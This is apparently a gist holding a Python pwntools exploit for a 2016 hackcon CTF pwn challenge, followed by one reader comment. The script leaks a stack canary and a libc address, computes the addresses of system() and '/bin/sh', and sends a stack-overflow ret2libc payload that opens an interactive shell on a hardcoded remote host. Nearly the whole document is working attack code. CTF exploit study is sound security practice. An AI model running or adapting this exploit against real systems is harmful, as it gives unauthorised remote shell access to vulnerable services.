[hackcon]easypwnie
from pwn import *
import numpy as np
import sys
'''
0x00019ad3 <+243>: mov DWORD PTR [esp],eax
0x00019ad6 <+246>: call 0x32f50 <exit>
p system
$2 = {<text variable, no debug info>} 0x3fe70 <system>
.rodata:0015DA8C aBinSh db '/bin/sh',0
'''
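local = False

# Targets.  The remote host is the 2016 hackcon CTF box, long since gone.
# Only point this script at a host you are authorised to attack: it finishes
# by handing you an interactive shell on the target.
LOCAL_HOST, LOCAL_PORT = "127.0.0.1", 8888
REMOTE_HOST, REMOTE_PORT = '54.218.14.40', 3031

# Per-build libc offsets, read off each libc with gdb/IDA (see the notes at
# the top of the file).  The two builds differ, so each target has its own set.
#   ret    - offset of the word the second leak returns: a return address
#            into libc (the `<+243>` site right before `call exit` in the
#            snippet; presumably __libc_start_main's return-from-main).
#   system - offset of system().
#   binsh  - offset of the "/bin/sh" string in .rodata.
OFFSETS = {
    "remote": {"ret": 0x00019ad3, "system": 0x3fe70, "binsh": 0x15da8c},
    "local":  {"ret": 0x00019a63, "system": 0x3e3e0, "binsh": 0x15fa69},
}

# Frame layout of the overflowed write, taken from the original payload:
# 10 bytes up to the stack canary, then 12 more up to the saved return
# address (presumably saved registers + ebp).  Confirm against the binary
# before reusing on a different build.
PAD_TO_CANARY = 10
PAD_TO_RET = 12

# NOTE: this script targets Python 2 pwntools (str tubes, raw_input()).


def parse_leak(line):
    """Return the leaked word the service prints after "be ", as a uint32.

    The service prints the word as a signed decimal integer; masking with
    0xffffffff restores the 32-bit address/canary.  The original used
    numpy.uint32 for the wrap, which is a dependency for a one-line mask and
    raises OverflowError on negative input with numpy >= 2.

    Args:
        line: one line of service output.  pwntools' recvline(timeout=...)
            returns '' on timeout, so an empty line is the common failure.

    Returns:
        The leaked value as a non-negative int in [0, 2**32).

    Raises:
        ValueError: when the line holds no "be <int>" (timed-out read or an
            unexpected message) instead of the original's bare IndexError.
    """
    _, sep, tail = line.partition("be ")
    if not sep:
        raise ValueError("no leak in service output: %r" % (line,))
    return int(tail) & 0xffffffff


def read_leak(s, query, skip_first):
    """Send an index-pair query and return the word the service leaks.

    Args:
        s: the pwntools tube to the service.
        query: the "<a> <b>" pair to send.  Pairs outside the intended range
            apparently make the service print a word from the stack.
        skip_first: the remote build prints one extra line before the value
            and the local build does not; discard it when set.  Line lengths
            are printed as a debugging aid, as in the original.

    Returns:
        The leaked word as a uint32 (see parse_leak).
    """
    s.sendline(query)
    if skip_first:
        print(len(s.recvline(timeout=2)))
    line = s.recvline(timeout=2)
    sys.stdout.flush()
    print(len(line))
    return parse_leak(line)


def main():
    """Leak the canary and a libc address, then ret2libc to system("/bin/sh")."""
    target = "local" if local else "remote"
    off = OFFSETS[target]

    if local:
        s = remote(LOCAL_HOST, LOCAL_PORT)
    else:
        s = remote(REMOTE_HOST, REMOTE_PORT)
    raw_input()  # pause so a debugger can be attached before any input is sent

    # Banner: four lines we only print the length of (debugging aid).
    for _ in range(4):
        print(len(s.recvline(timeout=2)))

    canary = read_leak(s, "13 9", not local)
    print("Canary : %#x" % canary)

    # The second leak is a return address into libc, not libc's base; the
    # original mislabelled it as "libc base" and folded the correction into
    # the system/bin_sh arithmetic.  Compute the base once, explicitly.
    libc_ret = read_leak(s, "17 9", not local)
    libc_base = libc_ret - off["ret"]
    print("libc leak : %#x" % libc_ret)
    print("libc base : %#x" % libc_base)
    # (A stack address can apparently be read the same way with "-12 -1";
    # it was not needed for this exploit.)

    system_addr = libc_base + off["system"]
    bin_sh = libc_base + off["binsh"]

    # "0 1" presumably selects the write that overflows.  Payload: pad to the
    # canary, put the leaked canary back so the stack check passes, pad to
    # the saved return address, then the usual ret2libc triple: system,
    # a fake return address for system (bin_sh as filler), and its argument.
    s.sendline("0 1")
    payload = ('A' * PAD_TO_CANARY + p32(canary) + 'B' * PAD_TO_RET
               + p32(system_addr) + p32(bin_sh) * 2)
    s.sendline(payload)
    s.interactive()


if __name__ == "__main__":
    main()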
boslash commented Aug 22, 2016

I wonder how you found the offsets of system and /bin/sh on the server?
